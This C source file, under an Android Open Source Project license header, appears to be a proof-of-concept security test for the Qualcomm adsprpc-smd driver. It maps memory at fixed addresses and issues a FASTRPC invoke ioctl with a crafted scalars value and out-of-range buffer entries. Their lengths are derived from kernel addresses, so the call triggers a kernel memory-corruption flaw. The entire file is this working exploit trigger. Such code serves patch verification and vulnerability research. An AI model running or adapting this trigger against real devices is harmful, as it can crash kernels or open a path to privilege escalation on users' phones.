| /** |
| * Copyright (C) 2017 The Android Open Source Project |
| * |
| * Licensed under the Apache License, Version 2.0 (the "License"); |
| * you may not use this file except in compliance with the License. |
| * You may obtain a copy of the License at |
| * |
| * http://www.apache.org/licenses/LICENSE-2.0 |
| * |
| * Unless required by applicable law or agreed to in writing, software |
| * distributed under the License is distributed on an "AS IS" BASIS, |
| * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| * See the License for the specific language governing permissions and |
| * limitations under the License. |
| */ |
| |
| #define _GNU_SOURCE |
| #include <fcntl.h> |
| #include <pthread.h> |
| #include <stdint.h> |
| #include <stdio.h> |
| #include <string.h> |
| #include <sys/mman.h> |
| #include <sys/syscall.h> |
| #include <sys/types.h> |
| #include <sys/wait.h> |
| #include <unistd.h> |
| |
| struct remote_buf { |
| void *pv; /* buffer pointer */ |
| ssize_t len; /* length of buffer */ |
| }; |
| |
| struct fastrpc_ioctl_invoke { |
| uint32_t handle; /* remote handle */ |
| uint32_t sc; /* scalars describing the data */ |
| struct remote_buf *pra; /* remote arguments list */ |
| }; |
| |
| struct fastrpc_ioctl_invoke_fd { |
| struct fastrpc_ioctl_invoke inv; |
| int *fds; /* fd list */ |
| }; |
| |
| /* Retrives number of input buffers from the scalars parameter */ |
| #define REMOTE_SCALARS_INBUFS(sc) (((sc) >> 16) & 0x0ff) |
| |
| /* Retrives number of output buffers from the scalars parameter */ |
| #define REMOTE_SCALARS_OUTBUFS(sc) (((sc) >> 8) & 0x0ff) |
| |
| int main() { |
| int numbuf, fd; |
| |
| mmap((void *)0x20000000ul, 0x705000ul, 0x3ul, 0x32ul, |
| (int)0xffffffffffffffffl, 0x0ul); |
| fd = open("/dev/adsprpc-smd", 0x0ul, 0); |
| |
| mmap((void *)0x20705000ul, 0x1000ul, 0x3ul, 0x32ul, (int)0xffffffffffffffffl, |
| 0x0ul); |
| mmap((void *)0x20706000ul, 0x1000ul, 0x3ul, 0x32ul, (int)0xffffffffffffffffl, |
| 0x0ul); |
| mmap((void *)0x20707000ul, 0x1000ul, 0x3ul, 0x32ul, (int)0xffffffffffffffffl, |
| 0x0ul); |
| mmap((void *)0x10000, 0x100000ul, 0x3ul, 0x32ul, (int)0xffffffffffffffffl, |
| 0x0ul); |
| |
| struct fastrpc_ioctl_invoke invoke_param; |
| struct remote_buf *buf; |
| |
| buf = (struct remote_buf *)0x20705000; |
| |
| invoke_param.handle = 5; |
| invoke_param.sc = (uint32_t)0xffffff7f; |
| invoke_param.pra = buf; |
| |
| numbuf = REMOTE_SCALARS_INBUFS(invoke_param.sc) + |
| REMOTE_SCALARS_OUTBUFS(invoke_param.sc); |
| |
| size_t ptr = (size_t)(0xffffff800bde0160 + 0x10000 - 0xffffffc000000000); |
| |
| buf[0].pv = (void *)0x10000; |
| buf[0].len = 0x1; |
| |
| ptr = ptr & 0xffffffff000fffff; |
| |
| buf[508].pv = 0; |
| buf[508].len = ptr; |
| buf[509].pv = (void *)0x1ffff; |
| buf[509].len = 0; |
| |
| syscall(__NR_ioctl, fd, 0xc0105201ul, &invoke_param, 0, 0, 0); |
| |
| return 0; |
| } |